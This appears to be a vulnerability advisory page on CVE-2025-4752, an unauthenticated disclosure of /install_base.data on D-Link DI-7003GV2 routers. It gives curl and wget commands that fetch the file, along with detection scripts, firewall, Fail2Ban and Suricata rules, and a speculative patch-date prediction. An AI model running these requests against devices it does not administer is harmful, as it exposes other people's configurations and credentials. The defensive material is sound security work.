D-Link DI-7003GV2, Information Disclosure, CVE-2025-4752 (Medium)

How CVE-2025-4752 Works

The vulnerability in D-Link DI-7003GV2 firmware version 24.04.18D1 R(68125) stems from improper access control in the `/install_base.data` file. Attackers can remotely exploit this flaw to retrieve sensitive system information without authentication. The file, intended for installation configuration, inadvertently exposes internal data due to insufficient permission checks. When accessed via crafted HTTP requests, it leaks details such as device configurations, network parameters, or credentials. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:L) confirms the attack requires no user interaction and exploits low-complexity network vectors. Publicly disclosed PoCs demonstrate trivial exploitation, increasing its risk profile.

DailyCVE Form

Platform: D-Link DI-7003GV2
Version: 24.04.18D1 R(68125)
Vulnerability: Information Disclosure
Severity: Medium
Date: 06/03/2025

Prediction: Patch expected by 07/15/2025

What Undercode Say:

Analytics:

  • Exploit likelihood: High due to public PoC availability.
  • Attack surface: Remote, unauthenticated.
  • Impact: Leaked credentials/configs enable further attacks.

Exploit Commands:

curl -X GET http://<TARGET_IP>/install_base.data -o leaked_data.txt
wget http://<TARGET_IP>/install_base.data

Detection Script (Python):

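import requests

# Replace <TARGET_IP> with the address of a device you administer.
response = requests.get("http://<TARGET_IP>/install_base.data", timeout=10)
# A 200 response containing "config" means the file is served without authentication.
if response.status_code == 200 and "config" in response.text:
    print("[!] Vulnerable to CVE-2025-4752")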

Mitigation Steps:

1. Block external access to `/install_base.data` via firewall:

`iptables -A INPUT -p tcp --dport 80 -m string --string "/install_base.data" --algo bm -j DROP`

2. Apply firmware update post-patch release.

3. Restrict HTTP admin interface to trusted IPs.

Patch Verification:

md5sum /etc/www/install_base.data  # Compare with post-patch hash.

Log Monitoring (Fail2Ban):

[Definition]
failregex = ^<HOST>.*GET.*/install_base\.data
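
A log-triage sketch for the log monitoring idea above, added here as an example (not code from the original post or from D-Link). It finds requests for `/install_base.data` in web access logs and separates responses that were served (2xx) from those that were blocked. It assumes Combined Log Format lines from a proxy or logging device in front of the router; the names `triage` and `normalize` and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

TARGET_PATH = "/install_base.data"  # path named in the advisory

# Assumption: Combined Log Format, e.g. from a reverse proxy in front of the router.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalize(target):
    """Drop the query string, decode %-escapes, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def triage(lines):
    """Return {src_ip: {"served": n, "blocked": n}} for requests to TARGET_PATH."""
    hits = defaultdict(lambda: {"served": 0, "blocked": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize(m["target"]) != TARGET_PATH:
            continue
        # A 2xx status means the file content left the device: treat as disclosure.
        key = "served" if m["status"].startswith("2") else "blocked"
        hits[m["src"]][key] += 1
    return dict(hits)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [03/Jun/2025:10:00:01 +0000] "GET /install_base.data HTTP/1.1" 200 4096 "-" "curl/8.0"',
    '203.0.113.7 - - [03/Jun/2025:10:00:09 +0000] "GET /INSTALL%5Fbase.data?x=1 HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.23 - - [03/Jun/2025:10:02:30 +0000] "GET //install_base.data HTTP/1.1" 403 0 "-" "Wget/1.21"',
    '192.0.2.10 - - [03/Jun/2025:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Jun/2025:10:03:05 +0000] "GET /docs/install_base.data.html HTTP/1.1" 200 9 "-" "-"',
]

if __name__ == "__main__":
    for src, counts in triage(SAMPLE).items():
        print(f"{src}: served={counts['served']} blocked={counts['blocked']}")
```

Any source with a non-zero `served` count received the file, so credentials and configuration held on that device should be treated as exposed and rotated.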

Network Detection (Suricata):

alert http any any -> $HOME_NET any (msg:"CVE-2025-4752 Exploit Attempt"; flow:to_server; http.uri; content:"/install_base.data"; nocase; sid:1004752;)

Sources:

Reported By: nvd.nist.gov